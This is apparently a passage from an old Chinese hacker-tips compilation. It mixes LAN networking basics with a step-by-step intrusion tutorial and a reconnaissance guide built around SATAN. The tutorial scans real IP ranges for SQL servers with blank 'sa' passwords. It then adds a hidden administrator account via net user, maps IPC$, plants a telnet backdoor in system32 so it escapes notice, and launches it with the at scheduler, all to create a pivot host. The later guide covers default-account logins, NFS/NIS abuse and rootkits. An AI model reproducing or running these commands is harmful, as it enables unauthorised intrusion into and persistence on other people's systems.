107 电脑高手知识精华
电脑高手从fcbu.com开始
3、OICQ 聊天软件
现在国内很多人在使用该软件,然而由于该软件设计上的原因,注重了数据的传送效率,对
于安全性考虑的相对少一些,所以使用的是UD P 协议,给攻击者造成了漏洞,以至于对熟
悉UDP 编程的人只用很短的代码就可以编制出消息攻击器来。由于消息攻击器发出的数据
和正常的数据除了短时间发送的次数多以外,几乎没什么区别,所以基本上连防火墙软件也
无能为力。临时的解决办法是不要让你不熟悉的人成为你的好友,当然你也不要暴露你的好
友的O ICQ 号码给陌生人,对于来自陌生人的消息攻击,就是一下子有好多陌生人出现,
只需要退出OICQ 再重新登录就可以消除,若真是出现了来自某个“好友”的消息攻击,也
不用去一直点消息框,直接把你的这个“好友”D el 掉就可以了!
网络名词释义
局域网的特征 局域网分布范围小,投资少,配置简单等,具有如下特征:
1.传输速率高:一般为1Mbps--20Mbps,光纤高速网可达100Mbps,1000MbpS
2.支持传输介质种类多。
3.通信处理一般由网卡完成。
4.传输质量好,误码率低。
5.有规则的拓扑结构。
二、局域网的组成:
局域网一般由服务器,用户工作站,传输介质四部分组成。
1.服务器:
运行网络0S,提供硬盘、文件数据及打印机共享等服务功能,是网络控制的核心。
从应用来说较高配置的普通486 以上的兼容机都可以用于文件服务器,但从提高网络的
整体性能,尤其是从网络的系统稳定性来说,还是选用专用服务器为宜。
目前常见的NOS 主要有Netware,Unix 和Windows NT 三种。
Netware:
流行版本V3.12,V4.11,V5.0,对硬件要求低,应用环境与DOS 相似,技术完善,可
靠,支持多种工作站和协议,适于局域网操作系统,作为文件服务器,打印服务器性能好。
Unix:一种典型的32 位多用户的NOS,主要应用于超级小型机,大型机上,目前常用
版本有Unix SUR4.0。支持网络文件系统服务,提供数据等应用,功能强大,不易掌握,命
令复杂,由AT&T 和SCO 公司推出。
Windows NT Server 4.0:
一种面向分布式图形应用程序的完整平台系统,界面与Win95 相似,易于安装和管理,
且集成了Internet 网络管理工具,前景广阔。
服务器分为文件服务器,打印服务器,数据库服务器,在Internet 网上,还有Web,FTP,
E—mail 等服务器。
网络0S 朝着能支持多种通信协议,多种网卡和工作站的方向发展。
108 电脑高手知识精华
电脑高手从fcbu.com开始
2.工作站:可以有自己的0S,独立工作;通过运行工作站网络软件,访问Server 共享
资源,常见有DOS 工作站,Windows95 工作站。
3.网卡:将工作站式服务器连到网络上,实现资源共享和相互通信,数据转换和电信
号匹配。
网卡(NTC)的分类:
(1)速率:10Mbps,100Mbps
(2)总线类型:ISA/PCI
(3)传输介质接口:
单口:BNC(细缆)或RJ 一45(双绞线)
4.传输介质:目前常用的传输介质有双绞线,同轴电缆,光纤等。
(1)双绞线(TP):
将一对以上的双绞线封装在一个绝缘外套中,为了降低干扰,每对相互扭绕而成。分为
非屏蔽双绞线(UTP)和屏蔽双绞线(STP).局域网中UTP 分为3 类,4 类,5 类和超5 类四种。
以AMP 公司为例:
3 类:10Mbps,皮薄,皮上注“cat3’,箱上注“3 类”,305 米/箱,400 元/箱
4 类:网络中用的不多
5 类:(超5 类)100Mbps,10Mbps,皮厚,匝密,皮上注“cat5”,箱上注5 类,305 米
/箱,600—700 元/箱(每段100 米,接4 个中继器,最大500 米)
接线顺序: 正常: 白桔 桔 白绿 蓝 白蓝 绿 白棕 棕
1 2 3 4 5 6 7 8
集联: 白绿 绿 白桔 棕 白棕 桔 白蓝 蓝
1 2 3 4 5 6 7 8
STP:内部与UTP 相同,外包铝箔,Apple,IBM 公司网络产品要求使用STP 双绞线,
速率高,价格贵。
(2)同轴电缆:
由一根空心的外圆柱导体和一根位于中心轴线的内导线组成,两导体间用绝缘材料隔
开。
按直径分为粗缆和细缆。
粗缆:传输距离长,性能高但成本高,使用于大型局域网干线,连接时两端需终接器。
A.粗缆与外部收发器相连。
B.收发器与网卡之间用AUI 电缆相连。
C.网卡必须有AUI 接口:每段500 米,100 个用户,4 个中继器可达2500 米,收发器
之间最小2.5 米,收发器电缆最大50 米。
细缆:传输距离短,相对便宜,用T 型头,与BNC 网卡相连,两端安50 欧终端电阻。
每段185 米,4 个中继器,最大925 米,每段30 个用户,T 型头之间最小0.5 米。
按传输频带分为基带和宽带传输。
基带:数字信号,信号占整个信道,同一时间内能传送一种信号。
宽带:传送的是不同频率的信号。
(3)光纤:
应用光学原理,由光发送机产生光束,将电信号变为光信号,再把光信号导入光纤,在
另一端由光接收机接收光纤上传来的光信号,并把它变为电信号,经解码后再处理。分为单
109 电脑高手知识精华
电脑高手从fcbu.com开始
模光纤和多模光纤。绝缘保密性好。
单模光纤:由激光作光源,仅有一条光通路,传输距离长,2 公里以上。
多模光纤:由二极管发光,低速短距离,2 公里以内。
三、计算机网络软件体系:
四、局域网的几种工作模式:
1.专用服务器结构:(Server—Baseb)
又称为“工作站/文件服务器”结构,由若干台微机工作站与一台或多台文件服务器通
过通信线路连接起来组成工作站存取服务器文件,共享存储设备。
文件服务器自然以共享磁盘文件为主要目的。
对于一般的数据传递来说已经够用了,但是当数据库系统和其它复杂而被不断增加的用户使
用的应用系统到来的时候,服务器已经不能承担这样的任务了,因为随着用户的增多,为每
个用户服务的程序也增多,每个程序都是独立运行的大文件,给用户感觉极慢,因此产生了
客户机/服务器模式。
2.客户机/服务器模式:(client/server)
其中一台或几台较大的计算机集中进行共享数据库的管理和存取,称为服务器,而将其
它的应用处理工作分散到网络中其它微机上去做,构成分布式的处理系统,服务器控制管理
数据的能力己由文件管理方式上升为数据库管理方式,因此,C/S 由的服务器也称为数据库
服务器,注重于数据定义及存取安全后备及还原,并发控制及事务管理,执行诸如选择检索
和索引排序等数据库管理功能,它有足够的能力做到把通过其处理后用户所需的那一部分数
据而不是整个文件通过网络传送到客户机去,减轻了网络的传输负荷。C/S 结构是数据库
技术的发展和普遍应用与局域网技术发展相结合的结果。
3.对等式网络:(Peer—to—Peer)
在拓扑结构上与专用Server 与C/S 相同。在对等式网络结构中,没有专用服务器
每一个工作站既可以起客户机作用也可以起服务器作用。
网际协议IP 网际协议IPInternet 上使用的一个关键的低层协议是网际协议,通常称IP 协议。
我们利用一个共同遵守的通信协议,从而使 Internet 成为一个允许连接不同类型的计算机
和不同操作系统的网络。要使两台计算机彼此之间进行通信,必须使两台计算机使用同一种
"语言"。通信协议正像两台计算机交换信息所使用的共同语言,它规定了通信双方在通信中
所应共同遵守的约定。 计算机的通信协议精确地定义了计算机在彼此通信过程的所有细
节。例如,每台计算机发送的信息格式和含义,在什么情况下应发送规定的特殊信息,以及
接收方的计算机应做出哪些应答等等。
网际协议IP 协议提供了能适应各种各样网络硬件的灵活性,对底层网络硬件几乎没有任何
要求,任何一个网络只要可以从一个地点向另一个地点传送二进制数据,就可以使用IP 协
议加入 Internet 了。
如果希望能在 Internet 上进行交流和通信,则每台连上 Internet 的计算机都必须遵守IP 协
议。为此使用 Internet 的每台计算机都必须运行IP 软件,以便时刻准备发送或接收信息。
IP 协议对于网络通信有着重要的意义:网络中的计算机通过安装IP 软件,使许许多多的局
域网络构成了一个庞大而又严密的通信系统。从而使 Internet 看起来好像是真实存在的,
但实际上它是一种并不存在的虚拟网络,只不过是利用IP 协议把全世界上所有愿意接入
Internet 的计算机局域网络连接起来,使得它们彼此之间都能够通信。
110 电脑高手知识精华
电脑高手从fcbu.com开始
怎样做跳板!(sql 和ipc$的配合攻击)
今天给大家介绍一下通过sql 和ipc$配合攻击远程主机并把它作为我们的跳板。使用的工具:
流光for nt/2000,操作平台:nt/2000 首先用"流光"搜索sql 类型主机,我选的ip 段是211.23.*.*,
大约过了一两分钟,就有3 台机子被扫到,其中有两台是nt4.0,一台是win2000(用户名:sa,密
码:<null>空),我选了win2000 那台作为跳板,首先用sqlrcmd 与远程主机连接(工具-->sql 远程
命令,添上ip,用户名和密码,按确定,差不多过几秒钟就会看见SQL Remote Cmd For Fluxay
2001 by Assassin 1995 - 2000. Thanks to Eyas! Connect to 211.23.*.* MSSQL Server Success,
Type Command in Prompt. SQLCmd> 这句话,如果没有看见的话,说明远程主机不支持sql
远程登陆,我们这里只讨论可以远程登陆),然后用net use administrator 命令看看管理员在不
在(没在,不知到那去了,呵呵),下面我们要添加一个用户,net user love 1234/add(如果显示命令
成功,或者该用户已经存在,都说明你已经成功的添加了一个用户名为love,密码为1234 的用
户),然后我们要自己做administrator 了,net localgroup administrators love /add(如果显示命令成
功完成,或者该用户已经是该组成员,那么你就是administrator 了)下面我们打开cmd.exe,输入
net use 211.23.*.*ipc$ "1234" /user:"love"命令,如果显示命令成功完成,那么你就有90%的希
望把它作为我们的跳板, 首先上传一些文件(srv.exe,NTLM.exe),copy
hacktoolssrv.exe211.23.*.*admin$system32(srv.exe 是一个telnet 的程序,端口是99,admin$
是默认的共享,之所以上传到那里,是因为那里的文件比较多,不易被发觉,NTLM.exe 也要上
传),复制完了之后,我们就要启动srv.exe 这个程序了,(我们利用的是对方主机的Schedule<定
时服务>首先用net time 211.23.*.*, 看看对方主机的时间,(回显211.23.*.* 的本地时间是
上午09:23),然后我们用at 211.23.*.* 09:25 srv.exe 命令来启动srv.exe(这里要注意一下时间
的换算,24 小时制),回显:新添加了一项作业 ,其作业ID=?,这样我们只要等几分钟就可以
telnet 到主机了,过了几分钟⋯⋯,我们用命令telnet 211.23.*.* 99 来登陆主机,(如果成功会有
欢迎信息)然后我们要启动NTLM.exe 了(用于修改Windows 2000 Telnet Servery 身份验证的
方式)在telnet 状态下直接输入ntlm,回车,(成功之后回显:windows 2000 telnet dump,by
assassin,all rights reserved.done!)最后一步:从新启动对方主机的telnet 服务(不用退出telnet 状
态,直接输入net stop telnet,<停止telnet 服务>,net start telnet,<启动telnet 服务)(会有回显,由于
各个win2000 的版本不同,启动成功之后的的回显也不一样,这里不做介绍,)我们退出telnet 的
状态(命令:exit)然后在命令行下输入telnet 211.23.*.*,依照提示,接着输入用户名love,密
码,1234,回车,(如果成功会有欢迎信息),就这样,我们的跳板就做好了,你可以用它登陆倒任何
开启telnet 服务的主机,比如接着输入telnet 211.73.134.91(呵呵,可以登陆),作一个跳板是不是
很简单呢? 跳板可以在特殊的情况下隐藏你的ip,比如刚才登陆到211.73.134.91 所留的ip,
就是211.23.*.*的ip
呵呵,说了半天也累了,该去吃饭了,其实我也是菜鸟一个,大家共同研究研究吧!
远程攻击学习ABC—从SATAN 开始的漏洞收集(上)
我声明整理这篇文章的初衷不是怂恿更多人去搞破坏,只是想说明这么一件事情而已。如果
你以为这篇文章能教会你什么的话,那么你也错了,因为往往技术取决于你的经验,而经验
111 电脑高手知识精华
电脑高手从fcbu.com开始
这东西需要自己去实践。当然了,最重要的是这篇文章总得来说还是比较杂乱的。#漏洞的
感念:
漏洞是硬件、软件或者是安全策略上的错误而引起的缺陷,从而可以使别人能够利用这个缺
陷在系统未授权的情况下访问系统或者破坏系统的正常使用。这些缺陷所能影响到的网络范
围是很大的,其中包括路由器、客户和服务器程序、操作系统、防火墙等。
漏洞本身不会自己出现,它依赖于人的发现。而你每天看到的那些“最新”安全漏洞描述,
这些可能是被HACKER、安全服务组织、其程序生产商或者还有不安分者发现的。而这些
漏洞的信息则是以不同的方式发布的。如果这个漏洞是安全服务者或者是HACKER 还有就
是程序生产商发现的话那么就会及时的出现在一些安全资讯邮件列表或者BBS 上,以便于
网络单位查询和弥补。而那些被不安分者发现的漏洞,一般是通过破坏一大堆或者更多的服
务器来“发布”的。这个例子你可以用去年微软的一个bug 来证实。因为微软公司和安全服
务者接受到这个漏洞信息的代价是近万台服务器被Denial of Service。我记得我在去年在订
阅的国外一个网络破坏组织的内部邮件列表中收到一个关于Unix 中的缓冲区溢出的漏洞,
它所能影响到的Unix 版
本很多而且危险程度不小。但这个漏洞最后被打上补丁由安全服务组织发布却是在一个半月
之后,这短短的一个半月所受到伤害的服务器一大堆,其中还包括美国的MILNET 和印度
某核武器研究所。 #发现安全漏洞:
要想发现漏洞是一件复杂的过程,它需要你熟悉各种语言和相当的网络技术。但我提前说了,
我并没有发现过什么可值得说明的漏洞,你可理解为我仅仅只是知道这是怎么一回事就行
了。:)
在这里我本想从两部分来描述,第一就是漏洞的是怎么产生和人为产生的安全弱点;第二就
是我们做为一般用户怎么样才可以得到目标服务中存在着一些漏洞。但上个月在Net.kook
BBS 上Ghastful-elf 有发一篇《Simple Discover Safety Failing》,在这篇里他系统的讲述了产
生漏洞的情况和它们的共性,所以我就没必要再浪费我们的时间去描述了,就只说其二。如
何得到系统的漏洞信息
当然是扫描了。扫描器是自动检测远程或本地安全性弱点的程序。而真正的扫描器是TCP
端口扫描器,这样的一些程序可以指定某些TCP/IP 端口(ftp 等)以及她的服务进行检测,
记录住每个从目标机器中返回的信息。这样可以帮助你收集到目标主机上的有用的信息。而
其它像host、rusers 仅只是一些Unix 上的网络
应用程序,这些一般用在观察某种服务是否正常工作。扫描程序也是很多攻击者较为常用的,
很多攻击的开始都是从扫描先进行的。
一、SATAN——撒旦
SATAN 这程序应当是你知道的,它是Dan Farmer and Weitse Venema 用C、Perl 和一些HTML
专门为Unix 而设计的分析网络的安全管理和检测、报告的工具,利用它可以收集到目标主
机的很多信息。它能在很多Unix 平台上运行,大多都不需要移植。SATAN 的确很古老了,
但是它目前在网络安全领域中所起到的作用却一直没有衰退过,这也是值得我去描述它的原
因。SATAN 特点包括可扩展的框架、友好的界面以及检测系统的可伸缩方法。它总体结构
允许使用者方便的增加附加的探测器,它可以方便快速自动的检测很多系统,这也就是
SATAN 自1995 年4 月发布以来能成为网络安全领域的重要程序的原因之一。
SATAN 有一个很重要的也很奇特的功能,这个功能也体现了它的创造者的理念是很清楚的,
他明白这个是干什么的。那就是SATAN 的自动攻击程序。因为创作者把入侵做为了安全最
慎重的环节。
112 电脑高手知识精华
电脑高手从fcbu.com开始
在进一步讨论SATAN 之前有必要先了解SATAN 都能干些什么,如果你经常更新你的漏洞
资讯的话那么这对SATAN 来说是最好不过的了。因为它可以扫到目标主机的很多已知漏洞。
具体表现为:
●FTPD 脆弱性及ftp 目录是否可写。
目前大多数Unix 系统都提供FTPD(有些版本的Unix 是in.ftpd)守护进程,但启动时都是不
带参数启动的,有时候很多入侵者控制到主机后想得到更高级功能的FTPD 时会做重新启动
机器的处理,在启动FTPD 时会加进一些参数⋯⋯
●NIS 的脆弱性
NIS 是一种网络查询服务,它可以将所有包含系统管理员信息的文件保存在一个指定的主机
上向来自网络其它的用户提供这些信息。
●RSH 的脆弱性
它是Unix 中的一个服务程序,可以执行指定的命令。
●NFS 的脆弱性
NFS 是一种网络文件系统,一种允许一台机器通过TCP/IP 网络连接使用另一台机器上磁盘
空间和文件的协议。它目前已经成为了Int-ernet 上进行分布式访问的一种事实上的标准。
●X 服务器的脆弱性
●Sendmail 服务器的脆弱性
Sendmail 的主要功能是转发邮件。从Sendmail 可以得到一些如当前时间和主机号等⋯
具体的扫描内容表现为:
●可写匿名的FTP 根目录
●借助TFTP 的对任意文件的访问
●从任何主机上的REXD 访问
●NIS 口令File 可被任何主机访问
●向任何host 调出的NFS 文件系统
●X 服务器的服务器控制无效
●老版本(在8.6.10 前)的Sendmail(据我所知现在这个似乎没有了)
我们就先从SATAN 的安装说起吧。SATAN 要比一般的扫描程序占用更多的资源,尤其是内
存和CPU 功能方面要求更高一些。并且它还需要一套Perl5.0 以上的脚本解释程序的支持,
还需要一个浏览器,因为它在运行的时候会自动启动浏览器。SATAN 程序包个头也比较大,
容易暴露目标,所以你在寻找SATAN 的安装平台的时候要想到以上几点,否则就有可能白
费功夫。SATAN 安装一般所在的目录是/satan -1.1.1(少数不同)。安装之前首先得运行Perl
程序reconfig,用它搜索各种不同的组成成分,并自定义目录的路径。要是遇到那些没有把
浏览器安装在标准目录里(并且没有在PATH 中进行设置)的那么就得你自己手工进行设置
了,因为reconfig 找不到。还有就是遇到没有用DNS(指的是自己机器上)的,那么就必
须在/satan-1.1.1/conf/satan.cf 中进行$dont_use_nslookuo=1 的设置了;最后你可以在分布式系
统上运行SATAN 的安装程序(IRIX 或SunOS),不过在编译的时候你可得多注意一下了,
很容易出错的。SATAN 可以自动扫描整个子网,驾御它很容易。但使用之前你必须拥有起
码的网络攻击的普通知识。一般对Unix 进行攻击大多首要目标就是得到一个普通的登陆用
户(我想这个在很多初学者都提过),即在/etc/passwd 或NIS 映射中的加密口令拷贝的获取,
得到后便可利用Crack 猜出至少一个口令。这就明显的表示出来对单一主机攻击的优越性,
注重在目标主机与漏洞共存的系统,也就理解为系统受托于目标系统、各个系统连接在一个
物理网上或者各个系统拥有相同的用户,那么攻击的发起者可以利用DNS 高速缓存崩溃或
113 电脑高手知识精华
电脑高手从fcbu.com开始
IP 欺骗伪装成某个受托系统或是用户,也可以是在信任主机或者是伪装成的信任关系与目
标机器的传输间架起一道屏障,即所谓的包截获,来截获来于目标机器与各个机器间的数据
信息。而目前最常见的则是对第一个用户口令的寻找,也就是上述所描述的/etc/passwd 或
NIS 了。SATAN 可以帮助你搜寻目标系统中未加限制的NFS 允许根对其读与写或根的脚本,
换句话来说就是SATAN 可以为你收集到目标机器各个用户的管理级别或根级别访问系统。
如果说用SATAN 对一台毫无安全而言的Unix 的话,根本不需要你做任何复杂的过程,它
都可以为你得到系统的进入点或是找到一些不需要级别用户的权限即可控制系统。这就言语
着ITL Scale 中所说的ITL9 级了,SATAN 可以跨越它。
因为在SATAN 中作者写进了攻击程序,即可以模拟入侵者来自动完成对系统的入侵。
这一点在Farmer&Venema93 年合著的《Improving the Securty of Your Site Breaking Into It》
和Farmer 的《computer-Oracle and passwd system(COPS)》中都有详细的说明,即便是现
在已经过了几年了,但这两篇著作仍有保持着其的权威性和重要性。
总得来说,一般远程攻击第一阶段是获取系统上的一个user name and passwd,而第一步又
可分为针对目标主机建立安全漏洞列表和信息库两个步骤,攻击者通过对目标主机的漏洞与
机会进行搭配,而获取对系统的访问权限;第二阶段就是获取根的访问权限,一旦可以获取
根的访问权限了那么这个机器就已经可以说被完全控制;第三阶段就是扩展访问权,用来对
其它网络进行攻击,这个阶段还包括清扫攻击时留下的痕迹,这样就可以把自己隐藏起来不
被发现(为此有人专门编写了一些隐藏踪迹的工具,最为著名的就是Kit Vtivoy 的rootkit
了,rootkit 里包括了ps、ls 、sum、who 等内容,rootkit 本身可以篡改系统内的ps、ls、sum、
who 等信息的输出,这样管理员就不能确定二进制的完整性Integrity,因为sum 被感染过,
被感染过的ps 则不能显示攻击者运行的程序,不过rootkit 这个程序因为作者只是想做为技
术交流所以没公开发布过, 所以一般不容易得到它( 如果你运气好的话可以到
ftp://semxa.technotr.com/tools/中“找”到它)。而SATAN 所能做到的就是第一、二阶段。要
想对SATAN 做详细的介绍和说明的话我想它可能得一本书来描述。在这里当然不能那么详
细的去做,所以尽量的用事例来说明它。可以从攻击者的角度来进行,首先来确定一个虚拟
的攻击目标再jack in it。
它为www.semxa.com,接着就这个目标进行走马观花一般的步骤说明。
A第一步千篇一律,那就是收集目标机器的信息。为了简单但又详细说明SATAN 的功能,
首先做的是不用SATAN 对www.semxa.com 进行扫描,而是背弃SATAN 之外的工具也或者
完全是手工完成它。因为我觉得这样更加有persuasion。
1、获取主机名和IP 地址以:
通过运行whois 和nslookup 可以获得semxa.com 域里的dns1.semxa.com 等几个主机,再用
named-xfer 程序的执行结果和whois、nslookup 的结果一起分析,这样就得到在semxa.com
域里那些DNS 服务器跟网络有连接。到了这个时候一个简单的分别ping 各主机便可得到这
些主机有那些是在Firewall 后等等信息。
同时还得到semxa.com 运行有ftp、telnet、SMTP 等服务。
不过很多攻击者不习惯于此!仅仅只是直接ping 主机获取IP,其它不做出判断。在这里获
得的IP 地址为:4.4.4.4
2、获取系统OS 类型信息:
通常攻击者习惯于利用telnet 来判断系统的OS,因为它得到的信息是比较可靠的。有时候
仅仅一个telnet 因为系统做过保护所以也不一定能有详细的诸如OS 具体类型、版本或者硬
件平台等等结果,攻击者会尝试利用缺省的无口令帐号登陆系统,这些帐号有:guest、lp、
114 电脑高手知识精华
电脑高手从fcbu.com开始
nuucp、tour、demos、4Dggifs9、root 等等。如果说某个telnet 守护程序允许你向它发送环境
变量并且不做任何接收限制的话这可是好的开端.当然管理员不会这么认为 or ;-)or;》3、获
取FTPD 信息:
一个简单的ftp 登陆,在起始行一般都会给出版本的信息。如
#ftp www.semxa.com
Connected to www.semxa.com
220 www.semxa.com FTP server(Digital UNX Version wed Apr 8
09:21:53 EDT 1998) ready.
⋯⋯
这个时候可以利用匿名用户ftp 或者anonymous 来尝试登陆,匿名的Ftp 对攻击收集信息来
说是很重要的。
User (www.semxa.com none)): ftp
530 User ftp access denied
Login failed.
⋯⋯
不过这个不允许匿名用户登陆,那么得到FTP server 的所存在的弱点也是很有必要的,虽然
说目前很多时候对于FTP server 的弱点不会更多的引起注意力,但我想不久的将来FTP
Server 上的弱点有可能是个deathblow。
4、获取Sendmail 信息:
直接用telnet connected to SMTP 的端25 来获取信息。Sendmail 最初
设计没有考虑其安全性,所以也是一个漏洞集中地。
#telnet www.semxa.com 25
229 www.semxa.com Sendmail 8.8.7/8.8.7 ready at Wed Apr
这里得到了Sendmail 版本为8.8.7,其配置文件版本也是8.8.7。如果说这里的版本是8.6.10
以前的话那么我就可以就此止步了。因为完全可以在它上面找到几个可用的漏洞来结束这次
攻击的第一阶段。
5、UDP/TCP 扫描获取信息:
这样去做主要是想获取目标系统中的/etc/inetd.conf 文件信息。这些文件提供了假定的监听端
口服务列表,它们允许对其进行telnet 的连接。但这么做很浪费时间,针对TCP 端口可以
依赖更快捷的途径如利用Strobe(ftp://semxa.technotr.com/tools/得到)来完成,但得注意Strobe
遗留痕迹的问题。可我喜欢它的速度,还因它不需要money 来login。:-)而对UDP 端口可
用COAST(ftp://semxa.technotr.com/tools/)来完成。这些信息那些可取那些不可取现在先别
去理会。等把所有的信息全部收集完成之后自己就这些信息做一个列表再慢慢analysis 了。
6、获取Portmap 信息:
网络服务主要通过三种机制提供的,它们是:永远监听端口的Network guardianship course、
用inetd 监听端口并在inetd 获得一个连接请求时被调用的网络程序以及用Portmap 程序为特
定程序的请求动态分配一个响应端口的rpc 服务。对此类信息的收集可以利用rpcbind
(ftp://semxa.tech-notr.com/tools/)程序完成,这个程序也是Weitse Venema 写的。
7、获取Boot 信息:
在这里主要想做的就是获得同一个LAN 网段内的bootps 服务访问权限,通过一个ping 来确
定目标机器的LAN 地址,而ping 会让目标机器产生一个ARP 请求包,在这个包里含有目
标机器的LAN 地址,然后可以转储目标系统的ARP 告诉缓存⋯⋯这是案例!需要你跟目标
115 电脑高手知识精华
电脑高手从fcbu.com开始
主机在同一个LAN 内,而现在的semxa.com 并非如此。所以此段信息即便是能获取也不会
有太大用处。当然了,如果能获取的话那么就证明跟semxa.com 是在一个LAN 内了。你可
以当这些话是废话。:)
8、尝试finger、rusers、rwho 来获取信息:
finger 用来显示用户信息,具体的做法随处可见了。而rusers 则是用来显示一台远程主机的
登陆用户列表的。rwho 跟who 有点相同,rwho 是显示在本地的网络上和主机有那些人在登
陆。rusers 会产生跟finger 类似的列表,但rusers 则不能查询单个用户的信息。表现为:#rusers
-1 www.semxa.com⋯⋯
rwho 对于攻击来说不是很有用的信息,但如果你跟目标主机是在同一个LAN 的话那么就可
另当别论了,rwho 依赖其守护进程rwhod,责任是向其它rwhod 程序定期广播这个时间段
谁在系统上的信息。
9、获取NFS Export 信息:
NFS 是一种系统程序,它主要负责文件传送操作的NFS 协议,另外还可以使用MOUNT 协
议标识要访问的文件系统及其所在的远程主机。NFS 有着良好的扩展性、信息访问的透明
性、简化了中央支持任务和网络管理等等优点。但它在安全上却有很大的问题。NFS 采用
的是客户机/server 结构的系统,客户机是一个使用远程目录的系统,那么此时远程目录就像
是它自己的本地文件系统的一部分一样;而server 提供本地资源能被远程主机安装的服务,
允许磁盘上的有关目录或文件被其它主机访问。网络文件系统就是通过NFS s-erver 的文件
系统安装到客户机的文件系统而得以实现的。NFS 协议只负责文件的传输工作,但不负责
连接文件系统。在server 端有一个叫mountd 的守护进程则负责安装任务,响应的安装程序
负责维持包含在安装工作中的一系列主机名和路径名,一般在Unix 中把已经共享的远程目
录安装到本地的过程叫做“安装(mountd)目录”,再把做为远程访问提供一个目录叫做:
“输出(exporting)目录”,前者是客户机的功能,后者是一种server 的功能。
在Unix 中,有个查询消息的showmount 命令,它的作用是在一台NFS 主机上跟某远程的
NFS 的信息。如果某个远程主机是通过rpcinfo -p 显示安装服务的话,那么用showmount 命
令可以询问到rpc.nounted 中的detail。它的参数包括有showmount -a(命令打印一列已经加
载输出文件系统的host)和showmount -e(命令请求打印的列表包含通过NFS 输出的文件
系统以及它的授权)。NFS uid 16-bit 就是个很显著的例子,一个NFS server 依赖客户端的认
证,但这种认证只是请求时的IP add,有个声称客户uid 为0+2^16=65536
的用户被accept 并且不重新映射为新UID。当这个用户提出请求访问拥有的文件时,对uid
的比较仅对其低16 位进行,就将允许这个用户伪装成根。就本身而言,NFS 应该是不对
Internet 开放的,即便是你需要那么做但也仅仅只能是读。如果说可以对根可以写的话,那
么这对网络安全来说绝对是一个笑柄了。NFS 依赖于客户方认证的。如果对showmount 所
输出的信息多加以分析的话,寻找它的漏洞所在,利用很多诸如Nfsbug、nfsmunu 等工具就
可以对NFS 进行jack in。10、获取NIS 信息:
网络信息服务NIS(以前也叫做黄页服务)允许在一个单位或者组织结构中共享系统管理方
面的信息数据库,比如用户组、口令文件等,NIS 可以为重要的管理文件提供重要服务,并
自动传送这些文件。使用NIS 可以达到集中管理的目的,不用再那么麻烦的在多台不同机
器上修改文件,能够保证整个网络上管理信息的一致性。NIS 也是基于客户/服务器模型。
通过NIS 访问同样的数据库的客户机的集合称为域。那些供网络查询的数据库通常由几个
标准的Unix 文件转换而成,这些数据库一般称为NIS 映像。NIS 的域的概念类似于DNS
中的域。
116 电脑高手知识精华
电脑高手从fcbu.com开始
在一个NIS 域中所有的计算机不但共享了NIS 数据库文件,也共享着同一个NIS server。为
了访问NIS 信息host 必须有相应的域名,并且只能属于一个特定的域。NIS 主server 保存
所有的数据库文件并对客户提供数据库访问和其它一些相关服务。NIS 的数据库ASCII 码文
件一般保存在/var/yp/dom-inname。而在Unix 下通过命令#domainname x 可以来检查或设置
NIS 域名。NIS server 在向NIS/yp 域中所有的系统分发关于数据库文件时,一般不做检测,
只要对方是自己NIS 域内并且知道其域名的每个ypbind 用户。这显然就安全而言不是什么
好事情,但对攻击者来说则是不错的现象。如果说用ftp 或者telnet smtp 发去N 次请求,导
致NIS 客户请求的响应发生反应迟钝的现象,这样就使NIS 客户广播一个请求,这请求跟
另一个NIS server 相连。
那么攻击的时候对这个请求进行响应,让它连到自己的系统之上,并向该客户发布口令映射,
如果这么完整的做完的话那么也就可以结束这次攻击的第一阶段了。
做为管理者而言,NIS 同NFS 一样,都不应该对Internet 是访问的。更不应在不信任的环境
下使用。保持良好的NIS 域名秘密而不易被猜到。
11、获取Web server 信息:
收集Web server 的信息是攻击中很main 的环节,虽然说Web 的守护进程httpd 不会发生间
接暴露server 信息的情况,但Web page 上的信息却很多都是有用的,当然了,这有用是针对攻
击者而言的。比如说一个信箱用户名也许对应的就是一个可以登陆系统的用户名等等。而
CGI、ASP 漏洞被攻击者所利用来攻击系统的事件也都屡见不鲜。这里可以为获取semxa.com
的Web 页面路径做些测试。简单的利用浏览器眼睛多注视左下角就可以获得页面的存放路
径,大多时间还将获得有关本地环境和URL 的信息,如果目标机器对它的URL 是隐藏的话
那么这个就是不存在的。通过建立一个Web 站点并使semxa.com 内的成员机跟它相连接,
这样可以获得一些客户信息,但也只实用于LAN。我一般是利用浏览器观察,把暂时认为
有用的信息会记录下来。
远程攻击学习ABC—从SATAN 开始的漏洞收集(下)
12、获取NNTP(网络新闻传输协议)信息:
很多时候通过NNTP 是攻击时获取目标主机信息的最好办法。NNTP 本身是用于新闻组
server 之间交换新闻的协议,它也适用于新闻浏览器跟新闻server 之间的协议。仔细的搜索
每条向目标主机地址中发送的网络新闻你就会发现这里面也有目标主机内投送源的Email
地址或者部分由目标主机用户投送的消息。但不管源自何处,这对攻击来说都将是收集目标
主机信息的方便之门。尽管NNTP 可以在投送时选择信任的主机来保护它的信息。但诸如
tin 可以解释在新闻中潜入的MINE 语句,可投送本身却隐藏着一个错误。如果有一条对.rhost
文件做外部ftp 的MINE 语句,那么就会很容易的为信任攻击打开系统之门。这对安全来说
可不是什么好事情。
13、收集关于路由的信息:
得到目标host 所在的该网关是否运行这对攻击来说是很重要的。因为网关程序信任来自未
授权源的路由包。当然了,首先你得明白网关与主机间的区别。网关是连接到多于一个网络
的设备,它可以有选择把数据从一个网络转发到其它网络中。路由器则是有着专用的网关。
而网关化的路由程序允许向其它路由守护程序广播路由表信息,这些路由包可以用来建立目
标主机中每个系统的路由表图,它们还有助于向这个域内的系统珍表增加host name。这些
查询可以利用netstat -nr 来完成。通过查询可以知道目标段的IP 是采取的哪个路由器connect
117 电脑高手知识精华
电脑高手从fcbu.com开始
的。
14、获取identd 信息:
获取目标host 是否运行了一个或者多个identd server,这对于判断出跟有连接的网络信息。
像获得运行着pidentd,那么起码可以得到一些用户的信息和系统版本的信息。比如说当现
在我有个认识的人他在我的ICQ 中,而他同时又是semxa.com 的一个用户,此时他正登陆
在semxa.com 上,那么我可以利用ICQ 发消息给他保持住跟他的connect,这样我就可以利
用工具SOidlook(ftp://semxa.technotr.com/tools/)得到identd 信息。获取identd 信息之后很
有用,可以针对semxa.com 的auth port 利用ICQ 跟semxa.com 的用户的连接再做N次connect
的尝试,impersonation 成该用户再摸索一些诸如FTP server 的bounce 等漏洞(如果有的话),
指定shell 或者注册port 作为server 的目标port,并且scan 客户机上all 可能的port。如果说
可以匹配的话那么就可以得到有用的rsh 或rlogin 对semxa.com 访问权的用户。当然现在这
只是猜想而已。最重要的还是能得到identd 信息。
15、获取IP 层信息:
